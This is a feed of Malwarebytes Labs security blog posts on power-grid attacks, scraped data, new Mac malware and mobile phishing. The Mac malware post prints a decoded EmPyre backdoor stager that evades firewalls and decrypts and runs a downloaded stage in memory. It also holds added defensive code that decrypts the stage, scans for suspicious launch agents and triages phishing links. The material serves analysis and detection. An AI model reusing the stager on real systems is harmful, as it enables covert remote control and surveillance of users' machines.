Now imagine something similar happening today. Would it result in the same criminal chaos? My guess is it would depend on the circumstances and how much time it takes to restore power. Let’s hope we never find out.

Power grid hardware

The underlying hardware of the power grid has gone through a lot of improvements since 1977. And so have backup systems and procedures.

In many countries, a power interruption that lasts longer than a given threshold gives the consumer the right to claim damages from the power company, to be paid by the electricity distributor. The amount of compensation and the threshold vary from one country to another, but you can usually look them up on the website of your provider.

This is not to say that it’s impossible to do physical damage if an attacker is determined enough, as the 2013 sniper attack on a California energy grid substation demonstrated.

Recent regulations and improvements have made it rare to experience power outages of more than a few hours in the western world—unless there are special circumstances, such as natural disasters. Tornadoes, hurricanes, earthquakes, erupting volcanoes, flooding, and wildfires can cause power outages, which makes dealing with those disasters even more difficult. Any other power outages are usually restored quickly or covered by backup systems.


We are aware of several malware variants that are used against power supplies, and some of them can be held responsible for major power outages around the globe.

Stuxnet is a worm designed to spread through Windows systems and go after specific programmable logic controllers (PLCs) by seeking out the engineering software used to program them. Stuxnet is believed to have been built specifically to sabotage the Iranian nuclear program, but the same approach could be turned against power plants.

A group of hackers dubbed Sandworm, suspected to be based in Russia, cut power to parts of the Ukrainian grid in December 2015 using malware called BlackEnergy. The malware opened a backdoor that gave the attackers enough control over infected machines to cross over into the operational network. Once there, they started flipping switches through the operators’ own control software, disabling IT infrastructure, and deleting files. Earlier, in 2014, the US government reported that hackers had planted BlackEnergy on the networks of American power and water utilities, but nothing came of it.

If any countermeasures were taken in Ukraine, they turned out to be insufficient, or at least unable to withstand CrashOverRide. CrashOverRide, aka Industroyer, is adaptable malware that can automate and orchestrate mass power outages, and it was likely the tool used in the December 2016 cyberattack against the Ukrainian transmission operator Ukrenergo. CrashOverRide speaks the industrial protocols of legacy substation equipment directly, so it can control switches and circuit breakers, allowing an attacker to simply turn off power distribution, which can lead to cascading failures and more severe damage to equipment.

Dragonfly, aka Energetic Bear, is a malware campaign that uses a variety of infection vectors in an effort to gain access to a victim’s network, including malicious emails, watering hole attacks, and Trojanized software. Part of this campaign was a malicious email disguised as an invitation to a New Year’s Eve party to targets in the energy sector in December 2015.

The Sandworm malware, discovered in 2014, uses a vulnerability in the way PowerPoint handles embedded objects to launch external files from a malicious PowerPoint file. In a Sandworm attack, the malicious PowerPoint file pulls in two files from a remote server that combine to deliver the malware payload. Sandworm has been used in targeted attacks against NATO, the European Union, and companies in the telecommunications and energy sectors.

Backup systems

It may seem obvious to point out that critical systems like hospitals should have independent emergency power backup systems. And most of them do. But are they tested regularly for functionality? Do they have enough supplies to last during a prolonged power outage? Is there an option to turn them on manually if they fail to kick in automatically? And is someone available on premise who knows how to do this?

Emergency power systems come in many shapes and sizes. Standby generators are probably the best known; they rely on some kind of fuel to provide emergency power. Batteries, by contrast, release stored power when it is needed, but they are generally a solution for hours rather than days, and they lose some charge even when not in use. It is imperative to find a backup solution that is robust enough to meet your needs in a worst-case scenario.

Energy sources

Theoretically, there are other ways to disrupt the power grid, for example by cutting off the resources used to run the power plants, such as coal, water, wind, solar, nuclear fuel, and natural gas. This is a good reason to use a wide variety of resources, and another excellent reason to use renewable energy. It is also why OPEC has so much influence in the world today.

To show that hacking into power supplies is not entirely theoretical, we want to mention that Iranian hackers infiltrated the control system of a small dam less than 20 miles from New York City in 2013. Unfortunately, many power plants are still accessible from the Internet in unnecessary ways that endanger their cybersecurity.


Attackers have tools at their disposal capable of causing serious damage to the power grid. Therefore, the power industry must take precautions and upgrade its cybersecurity to keep its systems safe, and it should do more than just meet the minimum security standard. Grid operators and their suppliers should have their ability to withstand cyberattacks tested on a regular basis.

This is especially true for nuclear power plants, where a loss of control can have more catastrophic consequences than just the loss of power output. Since 9/11, every company operating nuclear power plants has had an NRC-approved cybersecurity program in place, but cybersecurity was not such an issue when these plants were designed.

Besides cybersecurity, there are physical measures a government could enforce to improve the stability of a stressed power grid. As Joshua Pearce, a professor of electrical and computer engineering at Michigan Technological University, put it:

If we want to have a secure grid and go full throttle on renewable energy, what it means is we need to break up the grid into a bunch of microgrids that still act together as a full grid, so that we still have all the benefits that we have today with our giant centralized grid while still having the security.

In an attack, such a microgrid could be taken out without having an ill effect on all the other microgrids—which would make a successful attack less disastrous.

It would also stand to reason to take heed of the advice of Energy Secretary Rick Perry, who told lawmakers at an appropriations hearing that cyberattacks are literally happening hundreds of thousands of times a day. He warned that the Department of Energy needs an office of cybersecurity and emergency response to be prepared for such threats in the future. Looking at what has already taken place, plus what is vulnerable to attack, we have to agree.

The post Compromising vital infrastructure: the power grid appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Data scraping treasure trove found in the wild

Malwarebytes - Tue, 12/11/2018 - 16:56

We bring word of yet more data exposure, in the form of “nonsensitive” scraped data to the tune of 66 million records across three large databases. The information was apparently scraped from various sources and left to gather dust, for anyone lucky enough to stumble upon it.

What is data scraping?

Data scraping is the gathering of information from websites, either by manual means (which isn’t time efficient) or by automated processes such as dedicated programs or bots. Often the scraping is for nefarious purposes, from marketing spam to outright threatening behaviour. It typically relies on the person being scraped having provided much of the grabbable data upfront. It’s frowned upon, but where it stands legally is often unclear.

Scrape all the things

Three large databases were found by security researchers, containing a combined 66,147,856 unique records. At least one instance was exposed due to a lack of authentication. The records are very business-centric; one, for example, contains full name, email, listed location, employment history, and skills. This sounds very much like the information you see on a public-facing LinkedIn profile. Indeed, many people have said they received breach notifications at their LinkedIn-specific email address, and there is some mention of GitHub too.

Elsewhere, some 22 million records were found on the second server, relating to job search aggregation data: IP address, name, email, and potential job locations. The third held 48 million records and also sounds like a generic business-centric dump: name, phone, employer, and so on.

Is the threat serious?

The information collected isn’t exactly a red hot dump of personal information, but it’s certainly useful for phishing attempts. It could also prove useful to anyone wanting a ready made marketing list. The big problem is that even if the ones doing the data scraping had no harmful intentions, that may not apply to anybody finding the treasure trove.

Given how this information was stumbled upon in the first place, there’s no real way to know how many bad actors got their hands on it first.

How can I reduce the scraping risk?

Well, that’s a good question. Given that the data was (mostly) freely given online, at least in the case of the LinkedIn profile information, it’s all about personal choice. Take a look at your LinkedIn right now. Are you happy with what’s on display? Have you hidden any of it? Perhaps it’s a good idea to remove older roles, or jobs of a sensitive nature. Maybe that phone number doesn’t need to be so prominent. How about location: does it have to be so precise, or would a broader area suffice?

Unfortunately, many people don’t consider the information they place online to be harmful, until it suddenly is. By the time it’s been scraped, plundered, and jammed into a larger database, it’s already too late to do anything about it.

The only real solution is to control every last aspect of what you’re happy to place in front of everybody else, which for most people involves having to dredge up a list of sites and accounts then start stripping things out. That’s fine; it’s never too late to start pulling things offline that don’t need to be there.

Next steps for anyone affected?

Given the very prominent business angle to this one, it’d be wise to consider who may look to take advantage of it. Alongside the previously mentioned phishers, this is the kind of thing someone could use alongside the offer of fake jobs. If you want to become a money mule, this could definitely be the “perfect” lead in!

A common destination for business-centric grab bags such as this one is unremarkable job search sites. Be on the lookout for a flood of poor-quality job offer spam. Be especially wary if they come bearing offers of paid membership: nobody should pay a site that grabbed their data free of charge and is now using it to spam them with nonsense.

Ah yes, spam.

Scraped email lists will inevitably be spammed, so readjust your quality filters if needed. The good news is, most email offerings do a pretty good job of keeping your mailbox clean.

Almost all of us will end up in a data dump at some point. Whether scraped or hacked, being cautious around strange phonecalls and peculiar emails will go a long way towards minimising any further potential harm.

The post Data scraping treasure trove found in the wild appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Flurry of new Mac malware drops in December

Malwarebytes - Tue, 12/11/2018 - 16:00

Last week, we wrote about a new piece of malware called DarthMiner. It turns out there was more to be seen, as not just one but two additional pieces of malware had been spotted. The first was identified by Microsoft’s John Lambert and analyzed by Objective-See’s Patrick Wardle, and the second was found by Malwarebytes’ Adam Thomas.

A Word document with a malicious macro

Lambert identified a malicious Microsoft Word document containing a malicious Visual Basic macro in a tweet that provided a VirusTotal link to the file. Wardle analyzed the document, which was named BitcoinMagazine-Quidax_InterviewQuestions_2018.docm, and the payload that it dropped.

Ordinarily, macros in Microsoft Office documents are sandboxed, meaning that they shouldn’t have any ability to make changes to the file system. However, in this case, the document uses a sandbox escape to create a launch agent on the system. This launch agent provides persistence to a Python script that sets up a Meterpreter backdoor.

Interestingly, this malware is a copy-and-paste job from a proof-of-concept published by Adam Chester back in February, even down to recycling the identifiers referring to Chester’s blog site, except that Chester hypothesized using EmPyre instead of Meterpreter as the backdoor.

Of course, the attack relies on the user opening a malicious Word document and allowing the macros to run, so social engineering is the main snare. As long as you never, ever allow macros to run in Microsoft Office documents, you’re safe from this kind of malware.

A malicious Discord imitator

On Friday, Adam Thomas found a malicious copy of Discord, an app for gamers to communicate with other gamers. This copy of Discord didn’t seem to do anything, because it was actually an Automator script that did nothing visible for the user.

The script, shown in edited form above to fit in a screenshot, decodes and executes a Python payload, then begins repeatedly taking screenshots and uploading them to a command-and-control (C&C) server.

The decoded payload included quite a bit of Python code, including two additional snippets of base64-encoded Python. One of these bits of code set up an EmPyre backdoor:

qPnQAZwbqBZ='PBlqIV'
import sys, urllib2;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
# Evasion check: bail out if the Little Snitch firewall is running
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = ps.stdout.read()
ps.stdout.close()
if re.search("Little Snitch", out):
    sys.exit()
# Fetch the encrypted second stage from the C&C server with a browser User-Agent
# (the C&C URL is not reproduced here)
o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener();UA='Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0';o.addheaders=[('User-Agent',UA)];a=o.open('').read();key='7b3639a4ab39765739a5e0ed75bc8016';S,j,out=range(256),0,[]
# RC4 key scheduling with the embedded staging key
for i in range(256):
    j=(j+S[i]+ord(key[i%len(key)]))%256
    S[i],S[j]=S[j],S[i]
i=j=0
# RC4 keystream XOR: decrypt the downloaded stage in memory...
for char in a:
    i=(i+1)%256
    j=(j+S[i])%256
    S[i],S[j]=S[j],S[i]
    out.append(chr(ord(char)^S[(S[i]+S[j])%256]))
# ...and run it without ever writing it to disk
exec(''.join(out))
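Because the stage is decrypted in memory and never touches disk, an analyst who captured the stager’s HTTP exchange needs to repeat that RC4 step offline. The following is an added example, written for this edit and not code from the original post or from the malware, that reimplements the stager’s RC4 routine so a captured response body can be decrypted with the key lifted from the stager. CAPTURED_BODY is constructed by encrypting a harmless stand-in stage with that key, since the real C&C response is not reproduced here, and looks_like_python is a heuristic of mine, not something in the malware.

```python
import binascii

# Staging key exactly as embedded in the stager above: the ASCII bytes of this
# 32-character hex string are used directly as the RC4 key.
STAGING_KEY = "7b3639a4ab39765739a5e0ed75bc8016"


def rc4(key, data):
    """RC4 as the stager writes it: key scheduling over `key`, then the keystream
    XORed byte by byte with `data`. RC4 is symmetric, so this both encrypts
    and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)


def decrypt_stage(captured_body, staging_key=STAGING_KEY):
    """Recover the second stage from the raw HTTP response body the stager
    fetched (e.g. carved from a packet capture), using the key lifted from it."""
    return rc4(staging_key.encode("ascii"), captured_body)


def looks_like_python(blob):
    """Sanity check on a decrypted stage (my heuristic, not part of the malware):
    it must decode as text and contain something a Python launcher would."""
    try:
        text = blob.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return "import " in text or "exec(" in text


# Constructed sample standing in for a captured response. The "stage" is a
# harmless placeholder, not the real payload, encrypted with the real key so
# decrypt_stage() can be exercised offline.
SAMPLE_STAGE = b"import os, sys\nexec(\"print('second stage would start here')\")\n"
CAPTURED_BODY = rc4(STAGING_KEY.encode("ascii"), SAMPLE_STAGE)


if __name__ == "__main__":
    # Known-answer check for the RC4 implementation (standard test vector).
    print("rc4('Key', 'Plaintext') =", binascii.hexlify(rc4(b"Key", b"Plaintext")).decode())
    stage = decrypt_stage(CAPTURED_BODY)
    print("decrypted stage looks like Python:", looks_like_python(stage))
    print(stage.decode())
```

Point decrypt_stage at the response body of the stager’s first request; the unusual User-Agent string in the stager is a convenient way to find that request in a capture. If the result fails looks_like_python, either the key was mis-copied or the capture was cut at the wrong boundary.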

The script also sets up a launch agent, which persistently keeps both the screenshot code and the EmPyre backdoor code running.

This malware is really unconvincing, as it does nothing at all to pretend that it is a legit Discord app. It is not a maliciously-modified copy of the Discord app. It doesn’t even include and launch a copy of the Discord app, which it could do easily as a subterfuge to make the app look legit. For that matter, it doesn’t even use a convincing icon!

Instead, the malware uses a generic Automator applet icon, and all that happens when running is that a gear icon appears in the menu bar (as is normal for any Automator script).

Of course, by the time the user notices something is wrong, the malware has set up the launch agent, opened the backdoor, and sent off some screenshots. Many users may notice something is off, but they may not know what to do about it.

Interesting similarities

There are some interesting similarities between this fake Discord malware, which Malwarebytes detects as OSX.LamePyre, and the OSX.DarthMiner malware discovered earlier this week. Both are distributed in the form of Automator applets, both applets run Python scripts, and both use an EmPyre backdoor.

However, there are some differences as well. The means for running the Python script is different in these two cases. Further, the apparent primary purpose for the malware is also different: cryptomining, in the case of DarthMiner, and screen captures, in the case of LamePyre.

It seems likely that these could be made by the same person, but it’s also possible that one is a copycat of the other.

The Word macro malware (which Malwarebytes currently detects as OSX.BadWord, for lack of an official name) similarly sets up a backdoor using Python, and like OSX.DarthMiner, it executes the Python code directly in the launch agent, which is somewhat unusual. Of course, it uses a different backdoor and a different delivery method.
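Persistence that runs interpreter code straight from the launch agent is something you can hunt for. The following is an added example of mine, not code from the original post or from the malware, that parses LaunchAgent plists with plistlib and flags the traits described here: an interpreter invoked with inline code, decode-and-execute markers inside that code, and RunAtLoad combined with KeepAlive. The two plist samples are constructed (labels, paths and the base64 stand-in are made up), and the marker list and the 200-byte length threshold are my own heuristics.

```python
import base64
import glob
import os
import plistlib
import re

# Markers that, inside inline interpreter code, point at a decode-and-execute launcher.
PAYLOAD_MARKERS = re.compile(r"b64decode|base64|__import__|exec\(|urlopen|urllib")
INTERPRETERS = ("python", "perl", "ruby", "sh", "bash", "zsh")


def assess_launch_agent(plist_bytes):
    """Return the reasons a LaunchAgent/LaunchDaemon plist looks like the inline
    code persistence described above. An empty list means nothing stood out."""
    plist = plistlib.loads(plist_bytes)
    argv = [str(plist["Program"])] if plist.get("Program") else []
    argv += [str(a) for a in plist.get("ProgramArguments", [])]
    if not argv:
        return []
    reasons = []
    interpreter = os.path.basename(argv[0])
    if interpreter.startswith(INTERPRETERS) and "-c" in argv[1:]:
        inline = " ".join(argv[argv.index("-c") + 1:])
        reasons.append("%s runs inline code passed with -c" % interpreter)
        markers = sorted(set(PAYLOAD_MARKERS.findall(inline)))
        if markers:
            reasons.append("inline code decodes or fetches a payload (%s)" % ", ".join(markers))
        if len(inline) > 200:
            reasons.append("inline code is unusually long (%d bytes)" % len(inline))
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("RunAtLoad and KeepAlive: starts at login and is restarted if killed")
    return reasons


def scan_launch_agents(directory):
    """Assess every plist in a LaunchAgents/LaunchDaemons directory. Unreadable or
    malformed files are reported as a finding rather than silently skipped."""
    findings = {}
    for path in sorted(glob.glob(os.path.join(directory, "*.plist"))):
        try:
            with open(path, "rb") as fh:
                reasons = assess_launch_agent(fh.read())
        except Exception as exc:  # bad XML, bad permissions: worth a look either way
            reasons = ["could not parse: %s" % exc]
        if reasons:
            findings[path] = reasons
    return findings


# Constructed samples, not the malware's actual plists (its label is not reproduced here).
_STANDIN = base64.b64encode(b'print("constructed stand-in, not a real stage")').decode()

SUSPICIOUS_PLIST = ("""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/usr/bin/python</string>
    <string>-c</string>
    <string>import base64;exec(base64.b64decode('%s'))</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>""" % _STANDIN).encode()

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key><array>
    <string>/usr/local/bin/backup.sh</string>
    <string>--nightly</string>
  </array>
  <key>StartCalendarInterval</key><dict><key>Hour</key><integer>2</integer></dict>
</dict></plist>"""


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_PLIST), ("suspicious", SUSPICIOUS_PLIST)):
        print(name, "->", assess_launch_agent(sample) or "nothing flagged")
    for path, reasons in scan_launch_agents(os.path.expanduser("~/Library/LaunchAgents")).items():
        print(path)
        for reason in reasons:
            print("   ", reason)
```

Run it against ~/Library/LaunchAgents and /Library/LaunchAgents on a Mac you are triaging; a legitimate agent that points at a script on disk produces no findings, while the pattern described above trips all three checks.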

All three have made heavy use of borrowed code in the form of open-source backdoors (EmPyre in two cases, Metasploit’s Meterpreter module in the third) as well as copy-paste of VBA exploit code directly from a researcher’s blog.

Two malware, one maker?

The similarities between all these pieces of malware, as well as the close coincidence in timing (all were first submitted to VirusTotal within about a one-month period), may mean that they were all made by the same malware developer.

However, there is no concrete evidence for that supposition at this time. The IP addresses these pieces of malware communicate with are scattered around the globe in the US, Luxembourg, Germany, and the Netherlands, and there are no obvious connections between them. The code is similar, but not identical.

At this time, we are calling each of these by a different name, but will keep investigating.

In the meantime, the best things you can do to stay safe are:

  • Don’t allow macros to run in Microsoft Office documents
  • Don’t download software from anywhere other than the developer’s official site, and especially not piracy sites
  • Don’t open anything sent to you via email unless you know the sender and were expecting it
  • If you open a newly-downloaded application and something doesn’t work as expected, check with the developer

IOCs

BitcoinMagazine-Quidax_InterviewQuestions_2018.docm:
4454e768b295ed2869f657b2e9f47421b6ca0548e67092735665cd339a41dddb

a899a7d33d9ba80b6f9500585fa108178753894dfd249c2ba64c9d6a601c516b

The post Flurry of new Mac malware drops in December appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (December 3 – 9)

Malwarebytes - Mon, 12/10/2018 - 17:32

Last week on Malwarebytes Labs, we gave readers an FYI on multiple breaches that affected Humble Bundle, Quora, and Dunkin’ Donuts, to name a few. This follows the announcement from Marriott about a four-year-long breach that impacted half a billion of its patrons.

We also pushed out the report, “Under the Radar: The Future of Undetected Malware”, wherein we examined current threats and the technologies that are unprepared for them. You can download the report directly here.

Lastly, we discovered a new Mac malware that combines the capabilities of the EmPyre backdoor and the XMRig miner, and reported on a new Adobe Flash zero-day vulnerability that was used against a Russian facility in a targeted attack campaign.

Other cybersecurity news:

Stay safe!

The post A week in security (December 3 – 9) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Something else is phishy: How to detect phishing attempts on mobile

Malwarebytes - Mon, 12/10/2018 - 15:00

In a report published in 2011, IBM revealed that mobile users are three times more likely to fall for phishing scams than desktop users. This claim was based on access log files found on web servers used to host websites involved in phishing campaigns.

Seven years later, we continue to see different organizations reporting an increased trend in phishing attacks targeting the mobile market. Surprisingly, phishers seem to have tipped the scales to a new preferred target: iPhone users. Wandera, a mobile security solutions provider, has observed that iOS users experience twice as many phishing attacks as their Android counterparts.

Mobile phishing by the numbers

Below is a quick rundown of current noteworthy mobile phishing statistics to date:

  • In the whitepaper “Mobile phishing 2018: Myths and facts facing every modern enterprise today” (PDF), Lookout has determined that the rate at which users tap phishing links has grown an average of 85% per year since 2011.
  • In the latest “Phishing Activity Trend Report” (PDF), the Anti-Phishing Working Group (APWG) has revealed that the Payments industry continues to rank as the top targeted sector by phishing threat actors (36%) in Q1 2018.
  • This same APWG report also claims that 35% of all phishing sites were using HTTPS and SSL certificates.

    With Google Chrome now labeling non-HTTPS websites as “Not secure,” expect to see more phishers abuse the widespread assumption that HTTPS sites are trustworthy and legitimate.

  • In their report, “2018 State of Phish”, Wombat Security hailed smishing, short for SMS phishing, as the attack vector to watch. This is due to its increased media reporting in 2017, which they believe will continue to trend, especially in countries with low awareness of mobile phishing.
  • PhishLabs stated in its “2018 Phishing Trends & Intelligence Report” (PDF) that Email/Online Services is the top targeted industry in the second half of 2017 (26.1%), with a high concentration of phishing URLs mimicking Microsoft Office 365 login pages. This suggests that there is an increasing trend of phishing campaigns targeting businesses.
  • This same PhishLabs report has also noted a dramatic increase of phishing campaigns banking on the trust of users towards software-as-a-service (SaaS) companies (7.1%). Such attacks are said to be non-existent before 2015 but have more than doubled in two succeeding years.
  • Wandera stated that 48% of phishing attacks happen on mobile. They also claim that iOS users are 18X more likely to fall for a phish than to download malware.

Mobile phishing scam types

Phishing attacks are no longer exclusive to emails, especially on mobile. A mobile device’s inherent design and features have made it possible for phishers to create ways on how they can get into users’ heads and get their hands on vital personal and business data.

While many users are quite familiar with what phishing looks like on the desktop, these same users are not as familiar with smishing or vishing—and other types of phish one might encounter on the mobile—as they are with email phishing.


SMiShing is phishing done through SMS. Android expert and Senior Analyst Nathan Collier has written about a smishing message a colleague received on their Android device, purportedly originating from a human resources company and promoting an open, albeit fake, position of Prime Agent for Amazon.

iOS users also have their share of spotted smishing campaigns. Below is a smishing message posted publicly on Reddit as a warning to other iPhone users:

Screenshot of an iOS SMS phishing message. Courtesy of Redditor u/jamesmt87.

Your Apple ID has been disabled until we hear from you ,
Prevent this by confirming your informations at { URL}
Apple inc


Vishing, or voice phishing (the term is sometimes also expanded as VoIP phishing), is phishing done through a device’s call feature. An attempt can be considered vishing if the potential phisher (1) leaves a recorded message telling the target that something is wrong, (2) leaves a number that the target can use to call back, or (3) cold-calls the target. Point two is precisely the tactic used by an iOS phishing scam that Ars Technica editor Sean Gallagher revealed in a July 2018 post. According to Gallagher, an email directs users to a fake Apple website, which pops up a dialog box to start a call to a purported agent who goes by “Lance Roger at AppleCare.” AppleCare is Apple’s extended warranty service.

A vishing pop-up dialog box. Courtesy of Ars Technica.

In Android's corner we have the latest variant of Fakebank, a mobile Trojan capable of intercepting banking SMS as well as inbound and outgoing calls. A user who calls their legitimate bank, for example, is silently redirected to scammers posing as agents of that bank. Security researchers have spotted this variant in apps aimed at clients of Korean banks.

Vishing can also be a part of a greater business email compromise (BEC) attack.

Other types: messenger phishing, social phishing, and ad-network phishing

Apps continue to shape a user’s mobile experience for the better. Without them, one may likely just consider their phones as a pricey paperweight.

These brilliant little programs have made it possible for users to both access their personal and work emails while away from a desktop computer, keep in touch with family and friends via messaging platforms while on the go, share and access media in real-time, and stave off boredom while waiting.

Phishers, unfortunately, have leveraged the power of apps to their advantage. And the internet is rife with stories of people who got (or nearly got) phished via mobile apps.

Take, for instance, the Facebook message that used Messenger as a launchpad to spread a purported “viral video” of the recipient complete with their picture and name, and a number indicating the view count.

Screenshot of a Facebook Messenger phish. Courtesy of Security For Real People.

Tapping the “video” sent mobile users to a fake Facebook Videos login screen that prompted them for their Facebook credentials. Anyone who entered them had their account hijacked by the scammers, and the same video bait was then sent on to their contacts.

This is a case of messenger phishing. It is a type of phishing attempt that uses messaging services on mobile devices. Examples of these services are WhatsApp, Instagram, Viber, Skype, Snapchat, and Slack.

Then there’s social phishing, which is an attempt that abuses social networking sites to spread a phishing campaign. Below is a capture of a phishing message sent to a recipient via LinkedIn’s InMail feature:

Screenshot of a LinkedIn InMail phish. Courtesy of KnowBe4.

Here is another case of social phishing: a Twitter account posing as NatWest bank inserted itself into a live conversation between a NatWest customer and NatWest's official Twitter channel, offering a bogus quick fix for the very problem the real bank was trying to resolve.

Malwarebytes has caught a fake NatWest Twitter account red-handed.

Finally, ad-network phishing. On mobile, ads come in many forms: inside free apps, on web pages the user visits, and as pop-up notifications or banners. Because apps talk to other services (such as an ad network) in the background, they can expose mobile users to a phishing campaign (at best) or malware (at worst) without the user ever choosing to visit a malicious site.

We would be remiss not to mention phishing apps: fake apps that trade on the names of popular online brands and usually promise one or more perks once installed. Such was the case with multiple fake Instagram apps that were pulled from the Google Play store after they were found to collect credentials. These apps, which promised to boost follower counts, post likes, and comments, had been downloaded 1.5 million times.

Mobile phish spotting

Mobile phishing attempts are hard to detect, even more so for the uninitiated. Whatever your level of know-how or platform of choice, the rule of thumb is to familiarize yourself with common phishing tactics and trends. We already have a comprehensive list of red flags for spotting phishing attempts in general; the tell-tale signs below are the ones that matter most on mobile:

  • The message comes out of the blue, claiming that you (1) won a prize, (2) have had an account or subscription suddenly deactivated (often with no reason given), or (3) must urgently do something to fix a problem. These are tried-and-tested social engineering ploys, and more often than not they give the game away.

    Even when a notification of a real breach arrives and steps really must be taken, it is best not to tap the links in it (faster and more convenient as that is). Go directly to the legitimate site instead, from a bookmark or by typing the address into the address bar, and log in from there.

  • The message comes from an unknown number or sender. If it claims to be from a service you actually use, be doubly cautious. Since it is near impossible to confirm on a phone that a sender is who they say they are, verify any claim yourself, as in the point above, and check your account for logged suspicious activity. If something still bothers you, contact the provider's customer support department directly.
  • The message comes with a bogus hyperlink, which may be obvious to some but not to others. It pays to be very familiar with the official web addresses of the services you use online. If something feels off, even if you cannot say what, err on the side of caution and do not tap the link.
  • The message comes with a shortened URL. Shortening URLs makes good use of a limited character count, but it can also be abused to keep a malicious URL from being recognized at a glance.
  • The message or caller asks you for personal information. Most legitimate and reputable businesses do not call or send messages asking for sensitive information. Banks do sometimes call when they suspect fraud on your account, in order to check that you are who you say you are, but there is information they will never ask you to divulge, such as your account PIN or Social Security Number (SSN).
  • The message or caller does not address you by name. Most businesses know who their clients are and will address you by name.
  • The page you are sent to does not use HTTPS (no padlock in the address bar). HTTPS is no longer solid proof that a page is legitimate, but plenty of phishing campaigns still forgo it.
  • The URL you are sent to looks right but has unexplained hyphens after it. Phishers use a technique called URL padding: a legitimate-looking address is placed in the subdomain and padded with hyphens so that the real domain is pushed out of view and the link looks believable.

    Screenshot of a fake Facebook login screen where phishers used URL padding. Courtesy of PhishLabs.

    In this example, the complete URL is hxxp://[dot]com/sign_in.html, where rickytaylk[dot]com is the real domain and everything before it is the long, hyphen-padded subdomain. Users would find it hard to view the complete URL on a phone's small screen, but they can copy the URL and paste it into a notes app, where it can be scrutinized in full.

A word on homograph attacks: yes, they work on mobile devices, too. Fortunately, many modern browsers display the Punycode version of a domain that contains confusables (non-Latin characters that look like one or more Latin letters).

A user who sees a Punycode URL in their mobile browser is at least alerted that they are somewhere they did not intend to be, which is a good thing. However, not every app that accepts and displays text has considered homograph attacks. According to Wandera's research, many communication and collaboration tools that employees use on both Android and iOS do not flag Punycode URLs as suspicious.

“Only Facebook Messenger, Instagram and Skype provided an opportunity for the user to identify the punycode URL by either showing a preview of the webpage with the xn prefix, or, in the case of skype, by not providing a hyperlink for domains using unicode, meaning users can’t click through from the message,” writes Liarna La Porta, Content Marketing Manager for Wandera, in a blog post. “While these apps are not providing the best methods of defense, they at least provide an opportunity to assess suspicious links more closely.”
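As an added example (not code from the original post or from Wandera), here is a small Python triage routine that applies the red flags above to a link copied out of a message: it undoes hxxp/[dot] defanging, surfaces any Punycode label, splits off the registrable domain, and flags padded subdomains, URL shorteners, missing HTTPS, and brand names that appear outside the registrable domain. The brand list, shortener list and sample links are constructed for the demonstration, and the domain split is deliberately naive (last two labels), so a real deployment would use a public-suffix list.

```python
from urllib.parse import urlsplit

# Constructed lists for this example; a real deployment would use the brands
# the organisation cares about and a maintained shortener list.
WATCHED_BRANDS = ("facebook", "apple", "paypal", "natwest")
SHORTENERS = {"bit.ly", "t.co", "goo.gl", "tinyurl.com", "ow.ly"}
PADDING_HYPHENS = 5   # hyphens in the subdomain before we call it "padded"


def defang_to_url(text):
    """Undo the hxxp:// and [dot] defanging used in reports and screenshots."""
    return (text.strip()
            .replace("hxxps://", "https://")
            .replace("hxxp://", "http://")
            .replace("[dot]", ".")
            .replace("[.]", "."))


def to_ascii_host(host):
    """IDNA-encode the host so homograph labels surface with the xn-- prefix.
    Falls back to the raw string if the codec rejects a label."""
    try:
        return host.encode("idna").decode("ascii")
    except UnicodeError:
        return host


def registrable_domain(host):
    """Last two labels. Naive on purpose: it ignores multi-part public
    suffixes such as co.uk, for which a public-suffix list is needed."""
    return ".".join(host.split(".")[-2:])


def red_flags(link):
    """Return (registrable_domain, [reasons]). An empty list means none of
    these cheap checks fired, not that the link is safe."""
    parts = urlsplit(defang_to_url(link))
    host = to_ascii_host((parts.hostname or "").lower())
    domain = registrable_domain(host)
    subdomain = host[:-(len(domain) + 1)] if host.endswith("." + domain) else ""
    reasons = []
    if parts.scheme != "https":
        reasons.append("no HTTPS")
    if domain in SHORTENERS:
        reasons.append("URL shortener hides the destination")
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("punycode label (possible homograph): " + host)
    if subdomain.count("-") >= PADDING_HYPHENS:
        reasons.append("padded subdomain hides the real domain " + domain)
    for brand in WATCHED_BRANDS:
        if brand not in domain and (brand in subdomain or brand in parts.path.lower()):
            reasons.append(f"'{brand}' appears outside the registrable domain")
    return domain, reasons


if __name__ == "__main__":
    # Constructed samples modelled on the cases described in the text.
    for link in (
        "https://www.facebook.com/login",
        "hxxp://m.facebook.com-----------------------validate----step1.rickytaylk[dot]com/sign_in.html",
        "https://аpple.com/verify",   # first letter is Cyrillic U+0430, not Latin a
        "http://bit.ly/2xyz",
    ):
        domain, reasons = red_flags(link)
        print(f"{domain:<20} {'; '.join(reasons) or 'no cheap red flags'}")
```

The padded sample reproduces the PhishLabs case: the registrable domain comes out as rickytaylk.com and "facebook" is found only in the subdomain. The Cyrillic sample shows why apps should render the xn-- form: once encoded, the host no longer contains the string "apple" at all.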

Phish-proof no more?

